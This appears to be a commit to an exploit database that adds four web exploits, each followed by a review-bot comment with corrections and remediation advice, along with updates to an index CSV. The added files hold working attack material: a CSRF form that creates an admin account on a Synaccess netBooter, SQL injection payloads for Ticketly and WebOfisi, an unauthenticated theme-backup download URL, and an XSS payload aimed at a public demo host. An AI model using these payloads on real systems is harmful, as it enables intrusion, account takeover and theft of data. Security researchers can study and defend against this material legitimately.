DB: 2018-11-22
4 changes to exploits/shellcodes macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC) Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC) Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin) Ticketly 1.0 - 'name' SQL Injection WordPress CherryFramework Themes 3.1.4 - Backup File Download WebOfisi E-Ticaret V4 - 'urun' SQL Injection
This commit is contained in:
parent
e3299ef341
commit
7967efda82
5 changed files with 171 additions and 1 deletions
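--- a/exploits/hardware/webapps/45894.txt
+++ b/exploits/hardware/webapps/45894.txt
@@ -0,0 +1,28 @@
+# Title: Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)
+# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
+# Exploit Date: 2018-11-17
+# Vendor: Synaccess Networks Inc.
+# Product web page: https://www.synaccess-net.com
+# Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)
+# Tested on: Synaccess server
+# CVE: N/A
+# Advisory ID: ZSL-2018-5501
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5501.php
+
+# Desc: The application interface allows users to perform certain
+# actions via HTTP requests without performing any validity checks
+# to verify the requests. This can be exploited to perform certai
+# actions with administrative privileges if a logged-in user visits
+# a malicious web site.
+
+<html>
+<body>
+<form action="http://10.0.0.19:8082/adm.htm" method="POST">
+<input type="hidden" name="add1" value="Nimda" />
+<input type="hidden" name="add2" value="123456" />
+<input type="hidden" name="add3" value="123456" />
+<input type="hidden" name="adm0" value="1" />
+<input type="submit" value="Gou" />
+</form>
+</body>
+</html>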
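Review bot: The third line of the `# Desc:` paragraph is cut short: `# to verify the requests. This can be exploited to perform certai` should read `certain`. The form's `action` points at `http://10.0.0.19:8082/adm.htm`, a private-range lab address, and a header line such as `# NOTE: 10.0.0.19:8082 is a placeholder for the device under test` would make that explicit instead of leaving the reader to infer it. From the defender's side the header could also record the remediation the description implies: the `adm.htm` handler appears to accept a state-changing POST with no per-session anti-CSRF token and no Origin/Referer validation, so the vendor fix is to require one, and device or proxy logs showing POSTs to `adm.htm` with an off-device Referer are the practical detection signal.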
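--- a/exploits/php/webapps/45895.txt
+++ b/exploits/php/webapps/45895.txt
@@ -0,0 +1,70 @@
+# Exploit Title: Ticketly 1.0 – 'name' SQL Injection
+# Exploit Author: Javier Olmedo
+# Website: https://hackpuntes.com
+# Date: 2018-11-19
+# Google Dork: N/A
+# Vendor: Abisoft (https://abisoftgt.net)
+# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
+# Affected Version: 1.0
+# Patched Version: unpatched
+# Category: Web Application
+# Platform: Windows & Ubuntu
+# Tested on: Win10x64 & Kali Linux
+# 6. References:
+# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/
+# CVE: N/A
+
+# 1. Technical Description:
+# Ticketly 1.0 are affected by SQL Injection in multiple parameters and
+# resources through POST. This allows a attacker to read and modify
+# sensitive information from the database used by the application.
+
+# 2. Proof Of Concept (PoC):
+# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter)
+---
+POST /ticketly/action/addproject.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/ticketly/projects.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Connection: close
+
+name=Test%22&description=Test
+---
+
+# 2.2 In another request, add two ' to receive a code 200 OK
+---
+POST /ticketly/action/addproject.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/ticketly/projects.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Connection: close
+
+name=Test%22%22&description=Test
+---
+
+# 3. Payloads
+# 3.1 Payload (boolean-based blind)
+name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test
+
+# 3.2 Payload (error-based)
+name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test
+
+#3.3 Payload (AND/OR time-based blind)
+name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test
+
+# 4. Vulnerables resources and parameters
+# /action/addproject.php (description, name, category_id and description)
+# /action/addticket.php (king_id, priority_id, project_id, status_id and title)
+# /reports.php (kind_id y status_id)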
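Review bot: The header says `# CVE: N/A` while the reference URL under `# 6. References:` is `cve-2018-18923-ticketly-1-0-multiples-sql-injections`, so one of the two appears stale; if that identifier is the assigned one, the header line should read `# CVE: CVE-2018-18923`. The prose in 2.1 and 2.2 says to add `'` to the `name` parameter, but both request bodies send `%22` (a double quote), so the description and the requests disagree. Section 4 names `king_id` for addticket.php but `kind_id` for reports.php, lists `description` twice for addproject.php, and uses the Spanish `y` for `and`; these look like typos and should be checked against the application. The section numbering also jumps from `# 6. References:` straight to `# 1. Technical Description:`. The remediation worth stating for the vendor is prepared statements with bound parameters on every resource listed in section 4, since the behavior described is consistent with POST values being interpolated into SQL.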
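--- a/exploits/php/webapps/45896.txt
+++ b/exploits/php/webapps/45896.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Wordpress CherryFramework Themes 3.1.4 - Backup File Download
+# Google Dork: inurl:/wp-content/themes/CherryFramework
+# Date: 2018-11-17
+# Exploit Author: b1p0l4r
+# Vendor Homepage: http://www.cherryframework.com/
+# Software Link: http://www.cherryframework.com/
+# Version: 3.x.x > 3.1.4
+# Tested on: Ubuntu 18.0.4.1
+# CVE : N/A
+
+# The CherryFramework Cherry theme 3.1.4 for WordPress allow
+# remote attackers to
+# obtain potentially sensitive information via
+# wp-content/themes/CherryFramework/admin/data_management/ download_backup.php
+# because it
+# offers the option of a ZIP archive containing the entire content of the wp-content/themes directory.
+
+# [PoC]
+# just open that files/link and then showing the popup for saving a .ZIP file
+# EXAMPLE LINK =
+
+https://www.victim.com/wp-content/themes/CherryFramework/admin/data_management/download_backup.php
+
+# IndoXploit, ZeroByte.ID, Eldersc0de Family, Exploiter Xero Team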
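Review bot: The path in the description, `# wp-content/themes/CherryFramework/admin/data_management/ download_backup.php`, contains a stray space before `download_backup.php`; the example link below gives it without the space, and the description line should match. `# Version: 3.x.x > 3.1.4` is ambiguous about which versions are affected (the description names 3.1.4 itself), so it should be rewritten as an explicit range, and `# Tested on: Ubuntu 18.0.4.1` is presumably `18.04.1`. The sentence `# The CherryFramework Cherry theme 3.1.4 for WordPress allow` should read `allows`. The remediation worth recording is that the download script appears reachable with no authentication or capability check; a theme update should gate it behind a logged-in administrator check and a nonce, and until then the endpoint can be blocked at the web server and requests to it logged.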
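--- a/exploits/php/webapps/45897.txt
+++ b/exploits/php/webapps/45897.txt
@@ -0,0 +1,44 @@
+# Exploit Title: WebOfisi E-Ticaret V4 - 'urun' SQL Injection
+# Date: 2018-11-21
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: https://www.web-ofisi.com
+# Software Demo: http://demobul.net/eticaretv4/
+# Software Link: https://drive.google.com/file/d/1ZghFSsYto-Vpv3PXunx8xm2g-Gs3HJwz/view?usp=sharing
+# Version: v4.0
+# Category: Webapps
+# Tested on: XAMPP for Linux
+# Description: E-Ticaret v4 is a professional online shopping script with many features.
+# Vulnerabilities have been discovered during penetration testing.
+
+# PoC : SQLi :
+# Request : /eticaretv4/arama.html?kategori=20&urun=test
+
+# Parameter : urun (GET)
+# Type : boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload:
+
+kategori=20&urun=test") RLIKE (SELECT (CASE WHEN (6525=6525)THEN 0x74656474 ELSE 0x28 END)) AND ("YWLa"="YWLa
+
+# Type: error-based
+# Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload:
+
+kategori=20&urun=test") OR (SELECT 6556 FROM(SELECT COUNT(*),CONCAT(0x71626b6b71,(SELECT(ELT(6556=6556,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("ExaV"="ExaV
+
+# Type: stacked queries
+# Title: MySQL < 5.0.12 stacked queries (heavy query)
+# Payload:
+
+kategori=20&urun=test");SELECT BENCHMARK(5000000,MD5(0x44527964)) AND ("KGaO"="KGaO
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload:
+
+kategori=20&urun=test") OR SLEEP(5) AND ("sDnb"="sDnb
+
+# PoC : XSS :
+# Payload :
+http://demobul.net/eticaretv4/arama.html?kategori=20&urun=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E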
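Review bot: The title names only the `urun` SQL injection, but the file ends with a separate reflected XSS finding against the same parameter (`# PoC : XSS :`); either the title and description should mention both findings or the XSS belongs in its own entry so the index row matches the content. The header gives `# Version: v4.0` while the title says `V4`, and one consistent form would help. The XSS example is written against the vendor's public demo host `demobul.net`, which the header should identify as a third-party system rather than a test target. The fix to record for the SQLi is prepared statements for `urun` and `kategori` in the handler behind `arama.html`, and for the XSS, contextual output encoding of the reflected search term.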
|
@ -6194,7 +6194,7 @@ id,file,description,date,author,type,platform,port
|
|||
45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
|
||||
45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
|
||||
45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
|
||||
45891,exploits/macos/dos/45891.c,"macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
|
||||
45891,exploits/macos/dos/45891.c,"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -40396,3 +40396,7 @@ id,file,description,date,author,type,platform,port
|
|||
45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80
|
||||
45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,80
|
||||
45892,exploits/php/webapps/45892.txt,"Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-20,"Javier Olmedo",webapps,php,80
|
||||
45894,exploits/hardware/webapps/45894.txt,"Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)",2018-11-21,LiquidWorm,webapps,hardware,
|
||||
45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80
|
||||
45896,exploits/php/webapps/45896.txt,"WordPress CherryFramework Themes 3.1.4 - Backup File Download",2018-11-21,b1p0l4r,webapps,php,80
|
||||
45897,exploits/php/webapps/45897.txt,"WebOfisi E-Ticaret V4 - 'urun' SQL Injection",2018-11-21,AkkuS,webapps,php,80
|
||||
|
|